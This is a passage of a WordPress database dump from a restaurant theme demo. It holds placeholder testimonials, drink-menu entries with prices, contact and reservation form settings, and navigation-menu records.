gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(42469,3153,'mkdf_testimonial_author','Ruby Anderson'),(42470,3153,'mkdf_testimonial_author_position','guest'),(42471,3153,'slide_template','default'),(42472,603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42473,603,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(42474,603,'mkdf_testimonial_author','Isabella Lee'),(42475,603,'mkdf_testimonial_author_position','guest'),(42476,603,'slide_template','default'),(42477,1348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42478,1348,'restaurant_menu_item_price','8$'),(42479,1348,'restaurant_menu_item_description','Corona, Corona Light, Modelo Light & Modelo Especial'),(42480,1348,'slide_template','default'),(42481,1349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42482,1349,'restaurant_menu_item_price','9$'),(42483,1349,'restaurant_menu_item_description','Budweiser or Bud Light. Florida only.'),(42484,1349,'slide_template','default'),(42485,1350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42486,1350,'restaurant_menu_item_price','120$'),(42487,1350,'restaurant_menu_item_description','Argentina'),(42488,1350,'slide_template','default'),(42489,1351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42490,1351,'restaurant_menu_item_price','150$'),(42491,1351,'restaurant_menu_item_description','WA'),(42492,1351,'slide_template','default'),(42493,1352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42494,1352,'restaurant_menu_item_price','170$'),(42495,1352,'restaurant_menu_item_description','Stag\'s Leap Wine Cellars, Napa Valley'),(42496,1352,'slide_template','default'),(42497,1353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42498,1353,'restaurant_menu_item_price','120$'),(42499,1353,'restaurant_menu_item_description','Cavit, Italy'),(42500,1353,'slide_template','default'),(42501,1354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42502,1354,'restaurant_menu_item_price','70$'),(42503,1354,'restaurant_menu_item_description','Chateau Ste. Michelle, WA'),(42504,1354,'slide_template','default'),(42505,1355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42506,1355,'restaurant_menu_item_price','20$'),(42507,1355,'restaurant_menu_item_description','Pusser\'s Rum & orange juice with a touch of pina colada mix.'),(42508,1355,'slide_template','default'),(42509,1356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42510,1356,'restaurant_menu_item_price','12$'),(42511,1356,'restaurant_menu_item_description','Grey Goose Vodka, fresh squeezed lime juice'),(42512,1356,'slide_template','default'),(42513,1357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42514,1357,'restaurant_menu_item_price','15$'),(42515,1357,'restaurant_menu_item_description','Fireball Cinnamon Whisky & RumChata.'),(42516,1357,'slide_template','default'),(42517,1358,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42518,1358,'restaurant_menu_item_price','9$'),(42519,1358,'restaurant_menu_item_description','Cruzan Single Barrel Rum, blackberry, banana and berry flavors.'),(42520,1358,'slide_template','default'),(42521,1360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42522,1360,'restaurant_menu_item_price','7$'),(42523,1360,'restaurant_menu_item_description','The traditional cuban cocktail combination. Refreshing lime and mint leaves. Made with Cruzan Light Rum.'),(42524,1360,'slide_template','default'),(42525,1361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42526,1361,'restaurant_menu_item_price','8$'),(42527,1361,'restaurant_menu_item_description','Smirnoff Vodka, Sauza Blue Tequila, Myer\'s Platinum, Gin, Blue Curocoo, Sour Mix and Sierra Mist'),(42528,1361,'slide_template','default'),(42529,1362,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42530,1362,'restaurant_menu_item_price','7$'),(42531,1362,'restaurant_menu_item_description','Made with Sauza Blue Tequila, watermelon and margarita mix. Topped with fresh watermelon and limes.'),(42532,1362,'slide_template','default'),(42533,1363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42534,1363,'restaurant_menu_item_price','5$'),(42535,1363,'restaurant_menu_item_description','Cruzan Rum, Fresh Mint and Sierra Mist.'),(42536,1363,'slide_template','default'),(42537,2904,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42538,2904,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(42539,2904,'mkdf_testimonial_author','anthony johnston'),(42540,2904,'mkdf_testimonial_author_position','guest'),(42541,2904,'slide_template','default'),(42542,2906,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42543,2906,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(42544,2906,'mkdf_testimonial_author','anthony johnston'),(42545,2906,'mkdf_testimonial_author_position','guest'),(42546,2906,'slide_template','default'),(42547,3154,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(42548,3154,'_mail','a:8:{s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(42549,3154,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(42550,3154,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(42551,3154,'_additional_settings',''),(42552,3154,'_locale','en_US'),(42553,3155,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42554,3155,'_form','<div class=\"mkdf-cf7-rf\">\n<label> Event name:[text* event-name]</label><div class=\"mkdf-cf7-rf-date\">\n<label> Event date:[date* your-date min:2018-08-01 max:2050-12-31 class:required \"2018-08-01\"]</label><label> Start time:[time* time-938 time-format:HH:mm min-hour:00-00 max-hour:24*00 step-hour:1]</label><label> End time:[time* time-624 time-format:HH:mm] </label>\n</div>\n[checkbox checkbox-201 \"I/We have flexible date\"]\n<div class=\"mkdf-cf7-rf-guests\">\n<label> Guests:[text* guests] </label><label> Budget:[text* budget]</label><p>[radio radio-653 class:guests label_first default:1 \"Total\" \"Per person\" ]</p>\n</div>\n<label> Contact name:[text* contact-name] </label>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Company (optional):[text company-name] </label><label>Industry (optional):[text industry-name]</label>\n</div>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Email:[email* your-email] </label><label>Phone:[text* phone-number]</label>\n</div>\n<div class=\"mkdf-cf7-rf-msg\">\n<label> Tell us more about event (optional):\n[textarea your-message] </label>\n</div>\n<div class=\"mkdf-cf7-rf-btn\">\n<div class=\"mkdf-cf7-rf-btn-inner\">\n[submit \"Send Reservation\"]\n</div>\n</div>\n</div>'),(42555,3155,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(42556,3155,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(42557,3155,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";s:16:\"invalid_datetime\";s:31:\"Invalid date and time supplied.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:12:\"invalid_time\";s:22:\"Invalid time supplied.\";}'),(42558,3155,'_additional_settings',''),(42559,3155,'_locale','en_US'),(42560,2905,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42561,2905,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(42562,2905,'mkdf_testimonial_author','Isabella Lee'),(42563,2905,'mkdf_testimonial_author_position','guest'),(42564,2905,'slide_template','default'),(42565,3771,'_menu_item_type','post_type'),(42566,3771,'_menu_item_menu_item_parent','3722'),(42567,3771,'_menu_item_object_id','3040'),(42568,3771,'_menu_item_object','page'),(42569,3771,'_menu_item_target',''),(42570,3771,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42571,3771,'_menu_item_xfn',''),(42572,3771,'_menu_item_url',''),(42573,3771,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42574,3771,'_menu_item_icon','null'),(42575,3772,'_menu_item_type','post_type'),(42576,3772,'_menu_item_menu_item_parent','3725'),(42577,3772,'_menu_item_object_id','3034'),(42578,3772,'_menu_item_object','page'),(42579,3772,'_menu_item_target',''),(42580,3772,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42581,3772,'_menu_item_xfn',''),(42582,3772,'_menu_item_url',''),(42583,3772,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42584,3772,'_menu_item_icon','null'),(42585,3773,'_menu_item_type','post_type'),(42586,3773,'_menu_item_menu_item_parent','3745'),(42587,3773,'_menu_item_object_id','3035'),(42588,3773,'_menu_item_object','page'),(42589,3773,'_menu_item_target',''),(42590,3773,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42591,3773,'_menu_item_xfn',''),(42592,3773,'_menu_item_url',''),(42593,3773,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42594,3773,'_menu_item_icon','null'),(42595,3774,'_menu_item_type','post_type'),(42596,3774,'_menu_item_menu_item_parent','3745'),(42597,3774,'_menu_item_object_id','3037'),(42598,3774,'_menu_item_object','page'),(42599,3774,'_menu_item_target',''),(42600,3774,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42601,3774,'_menu_item_xfn',''),(42602,3774,'_menu_item_url',''),(42603,3774,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42604,3774,'_menu_item_icon','null'),(42605,3775,'_menu_item_type','post_type'),(42606,3775,'_menu_item_menu_item_parent','3745'),(42607,3775,'_menu_item_object_id','3036'),(42608,3775,'_menu_item_object','page'),(42609,3775,'_menu_item_target',''),(42610,3775,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42611,3775,'_menu_item_xfn',''),(42612,3775,'_menu_item_url',''),(42613,3775,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42614,3775,'_menu_item_icon','null'),(42615,3776,'_menu_item_type','post_type'),(42616,3776,'_menu_item_menu_item_parent','3754'),(42617,3776,'_menu_item_object_id','3038'),(42618,3776,'_menu_item_object','page'),(42619,3776,'_menu_item_target',''),(42620,3776,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42621,3776,'_menu_item_xfn',''),(42622,3776,'_menu_item_url',''),(42623,3776,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42624,3776,'_menu_item_icon','null'),(42625,3777,'_menu_item_type','post_type'),(42626,3777,'_menu_item_menu_item_parent','3758'),(42627,3777,'_menu_item_object_id','3038'),(42628,3777,'_menu_item_object','page'),(42629,3777,'_menu_item_target',''),(42630,3777,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42631,3777,'_menu_item_xfn',''),(42632,3777,'_menu_item_url',''),(42633,3777,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42634,3777,'_menu_item_icon','null'),(42635,3778,'_menu_item_type','post_type'),(42636,3778,'_menu_item_menu_item_parent','3731'),(42637,3778,'_menu_item_object_id','3034'),(42638,3778,'_menu_item_object','page'),(42639,3778,'_menu_item_target',''),(42640,3778,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42641,3778,'_menu_item_xfn',''),(42642,3778,'_menu_item_url',''),(42643,3778,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42644,3778,'_menu_item_icon','null'),(42645,3779,'_menu_item_type','post_type'),(42646,3779,'_menu_item_menu_item_parent','3748'),(42647,3779,'_menu_item_object_id','3037'),(42648,3779,'_menu_item_object','page'),(42649,3779,'_menu_item_target',''),(42650,3779,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42651,3779,'_menu_item_xfn',''),(42652,3779,'_menu_item_url',''),(42653,3779,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42654,3779,'_menu_item_icon','null'),(42655,3780,'_menu_item_type','post_type'),(42656,3780,'_menu_item_menu_item_parent','3748'),(42657,3780,'_menu_item_object_id','3036'),(42658,3780,'_menu_item_object','page'),(42659,3780,'_menu_item_target',''),(42660,3780,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42661,3780,'_menu_item_xfn',''),(42662,3780,'_menu_item_url',''),(42663,3780,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42664,3780,'_menu_item_icon','null'),(42665,3781,'_menu_item_type','post_type'),(42666,3781,'_menu_item_menu_item_parent','3748'),(42667,3781,'_menu_item_object_id','3035'),(42668,3781,'_menu_item_object','page'),(42669,3781,'_menu_item_target',''),(42670,3781,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42671,3781,'_menu_item_xfn',''),(42672,3781,'_menu_item_url',''),(42673,3781,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42674,3781,'_menu_item_icon','null'),(42675,3782,'_menu_item_type','post_type'),(42676,3782,'_menu_item_menu_item_parent','3736'),(42677,3782,'_menu_item_object_id','3034'),(42678,3782,'_menu_item_object','page'),(42679,3782,'_menu_item_target',''),(42680,3782,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42681,3782,'_menu_item_xfn',''),(42682,3782,'_menu_item_url',''),(42683,3782,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42684,3783,'_menu_item_type','post_type'),(42685,3783,'_menu_item_menu_item_parent','3741'),(42686,3783,'_menu_item_object_id','3034'),(42687,3783,'_menu_item_object','page'),(42688,3783,'_menu_item_target',''),(42689,3783,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42690,3783,'_menu_item_xfn',''),(42691,3783,'_menu_item_url',''),(42692,3783,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42693,3784,'_menu_item_type','post_type'),(42694,3784,'_menu_item_menu_item_parent','3722'),(42695,3784,'_menu_item_object_id','3042'),(42696,3784,'_menu_item_object','page'),(42697,3784,'_menu_item_target',''),(42698,3784,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42699,3784,'_menu_item_xfn',''),(42700,3784,'_menu_item_url',''),(42701,3784,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42702,3784,'_menu_item_icon','null'),(42703,3785,'_menu_item_type','post_type'),(42704,3785,'_menu_item_menu_item_parent','3722'),(42705,3785,'_menu_item_object_id','3041'),(42706,3785,'_menu_item_object','page'),(42707,3785,'_menu_item_target',''),(42708,3785,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42709,3785,'_menu_item_xfn',''),(42710,3785,'_menu_item_url',''),(42711,3785,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42712,3785,'_menu_item_icon','null'),(42713,3786,'_menu_item_type','post_type'),(42714,3786,'_menu_item_menu_item_parent','3728'),(42715,3786,'_menu_item_object_id','3042'),(42716,3786,'_menu_item_object','page'),(42717,3786,'_menu_item_target',''),(42718,3786,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42719,3786,'_menu_item_xfn',''),(42720,3786,'_menu_item_url',''),(42721,3786,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42722,3786,'_menu_item_icon','null'),(42723,3787,'_menu_item_type','post_type'),(42724,3787,'_menu_item_menu_item_parent','3728'),(42725,3787,'_menu_item_object_id','3041'),(42726,3787,'_menu_item_object','page'),(42727,3787,'_menu_item_target',''),(42728,3787,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42729,3787,'_menu_item_xfn',''),(42730,3787,'_menu_item_url',''),(42731,3787,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42732,3787,'_menu_item_icon','null'),(42733,3788,'_menu_item_type','post_type'),(42734,3788,'_menu_item_menu_item_parent','3748'),(42735,3788,'_menu_item_object_id','3044'),(42736,3788,'_menu_item_object','page'),(42737,3788,'_menu_item_target',''),(42738,3788,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42739,3788,'_menu_item_xfn',''),(42740,3788,'_menu_item_url',''),(42741,3788,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42742,3788,'_menu_item_icon','null'),(42743,3789,'_menu_item_type','post_type'),(42744,3789,'_menu_item_menu_item_parent','3741'),(42745,3789,'_menu_item_object_id','3044'),(42746,3789,'_menu_item_object','page'),(42747,3789,'_menu_item_target',''),(42748,3789,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42749,3789,'_menu_item_xfn',''),(42750,3789,'_menu_item_url',''),(42751,3789,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42752,3790,'_menu_item_type','post_type'),(42753,3790,'_menu_item_menu_item_parent','3745'),(42754,3790,'_menu_item_object_id','3044'),(42755,3790,'_menu_item_object','page'),(42756,3790,'_menu_item_target',''),(42757,3790,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42758,3790,'_menu_item_xfn',''),(42759,3790,'_menu_item_url',''),(42760,3790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42761,3790,'_menu_item_icon','null'),(42762,3791,'_menu_item_type','post_type'),(42763,3791,'_menu_item_menu_item_parent','3723'),(42764,3791,'_menu_item_object_id','3043'),(42765,3791,'_menu_item_object','page'),(42766,3791,'_menu_item_target',''),(42767,3791,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42768,3791,'_menu_item_xfn',''),(42769,3791,'_menu_item_url',''),(42770,3791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42771,3791,'_menu_item_icon','null'),(42772,3792,'_menu_item_type','post_type'),(42773,3792,'_menu_item_menu_item_parent','3729'),(42774,3792,'_menu_item_object_id','3043'),(42775,3792,'_menu_item_object','page'),(42776,3792,'_menu_item_target',''),(42777,3792,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42778,3792,'_menu_item_xfn',''),(42779,3792,'_menu_item_url',''),(42780,3792,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42781,3792,'_menu_item_icon','null'),(42782,3793,'_menu_item_type','post_type'),(42783,3793,'_menu_item_menu_item_parent','3747'),(42784,3793,'_menu_item_object_id','3047'),(42785,3793,'_menu_item_object','page'),(42786,3793,'_menu_item_target',''),(42787,3793,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42788,3793,'_menu_item_xfn',''),(42789,3793,'_menu_item_url',''),(42790,3793,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42791,3793,'_menu_item_icon','null'),(42792,3794,'_menu_item_type','post_type'),(42793,3794,'_menu_item_menu_item_parent','3747'),(42794,3794,'_menu_item_object_id','3046'),(42795,3794,'_menu_item_object','page'),(42796,3794,'_menu_item_target',''),(42797,3794,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42798,3794,'_menu_item_xfn',''),(42799,3794,'_menu_item_url',''),(42800,3794,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42801,3794,'_menu_item_icon','null'),(42802,3795,'_menu_item_type','post_type'),(42803,3795,'_menu_item_menu_item_parent','3747'),(42804,3795,'_menu_item_object_id','3045'),(42805,3795,'_menu_item_object','page'),(42806,3795,'_menu_item_target',''),(42807,3795,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42808,3795,'_menu_item_xfn',''),(42809,3795,'_menu_item_url',''),(42810,3795,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42811,3795,'_menu_item_icon','null'),(42812,3796,'_menu_item_type','post_type'),(42813,3796,'_menu_item_menu_item_parent','3741'),(42814,3796,'_menu_item_object_id','3045'),(42815,3796,'_menu_item_object','page'),(42816,3796,'_menu_item_target',''),(42817,3796,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42818,3796,'_menu_item_xfn',''),(42819,3796,'_menu_item_url',''),(42820,3796,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42821,3797,'_menu_item_type','post_type'),(42822,3797,'_menu_item_menu_item_parent','3744'),(42823,3797,'_menu_item_object_id','3047'),(42824,3797,'_menu_item_object','page'),(42825,3797,'_menu_item_target',''),(42826,3797,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42827,3797,'_menu_item_xfn',''),(42828,3797,'_menu_item_url',''),(42829,3797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42830,3797,'_menu_item_icon','null'),(42831,3798,'_menu_item_type','post_type'),(42832,3798,'_menu_item_menu_item_parent','3744'),(42833,3798,'_menu_item_object_id','3046'),(42834,3798,'_menu_item_object','page'),(42835,3798,'_menu_item_target',''),(42836,3798,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42837,3798,'_menu_item_xfn',''),(42838,3798,'_menu_item_url',''),(42839,3798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42840,3798,'_menu_item_icon','null'),(42841,3799,'_menu_item_type','post_type'),(42842,3799,'_menu_item_menu_item_parent','3744'),(42843,3799,'_menu_item_object_id','3045'),(42844,3799,'_menu_item_object','page'),(42845,3799,'_menu_item_target',''),(42846,3799,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42847,3799,'_menu_item_xfn',''),(42848,3799,'_menu_item_url',''),(42849,3799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42850,3799,'_menu_item_icon','null'),(42851,3800,'_menu_item_type','post_type'),(42852,3800,'_menu_item_menu_item_parent','3729'),(42853,3800,'_menu_item_object_id','3048'),(42854,3800,'_menu_item_object','page'),(42855,3800,'_menu_item_target',''),(42856,3800,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42857,3800,'_menu_item_xfn',''),(42858,3800,'_menu_item_url',''),(42859,3800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42860,3800,'_menu_item_icon','null'),(42861,3801,'_menu_item_type','post_type'),(42862,3801,'_menu_item_menu_item_parent','3729'),(42863,3801,'_menu_item_object_id','3051'),(42864,3801,'_menu_item_object','page'),(42865,3801,'_menu_item_target',''),(42866,3801,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42867,3801,'_menu_item_xfn',''),(42868,3801,'_menu_item_url',''),(42869,3801,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42870,3801,'_menu_item_icon','null'),(42871,3802,'_menu_item_type','post_type'),(42872,3802,'_menu_item_menu_item_parent','3729'),(42873,3802,'_menu_item_object_id','3050'),(42874,3802,'_menu_item_object','page'),(42875,3802,'_menu_item_target',''),(42876,3802,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42877,3802,'_menu_item_xfn',''),(42878,3802,'_menu_item_url',''),(42879,3802,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42880,3802,'_menu_item_icon','null'),(42881,3803,'_menu_item_type','post_type'),(42882,3803,'_menu_item_menu_item_parent','3729'),(42883,3803,'_menu_item_object_id','3049'),(42884,3803,'_menu_item_object','page'),(42885,3803,'_menu_item_target',''),(42886,3803,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42887,3803,'_menu_item_xfn',''),(42888,3803,'_menu_item_url',''),(42889,3803,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42890,3803,'_menu_item_icon','null'),(42891,3804,'_menu_item_type','post_type'),(42892,3804,'_menu_item_menu_item_parent','3728'),(42893,3804,'_menu_item_object_id','3040'),(42894,3804,'_menu_item_object','page'),(42895,3804,'_menu_item_target',''),(42896,3804,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42897,3804,'_menu_item_xfn',''),(42898,3804,'_menu_item_url',''),(42899,3804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(42900,3804,'_menu_item_icon','null'),(42901,3805,'_menu_item_type','post_type'),(42902,3805,'_menu_item_menu_item_parent','3739'),(42903,3805,'_menu_item_object_id','3042'),(42904,3805,'_menu_item_object','page'),(42905,3805,'_menu_item_target',''),(42906,3805,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(42907,3805,'_m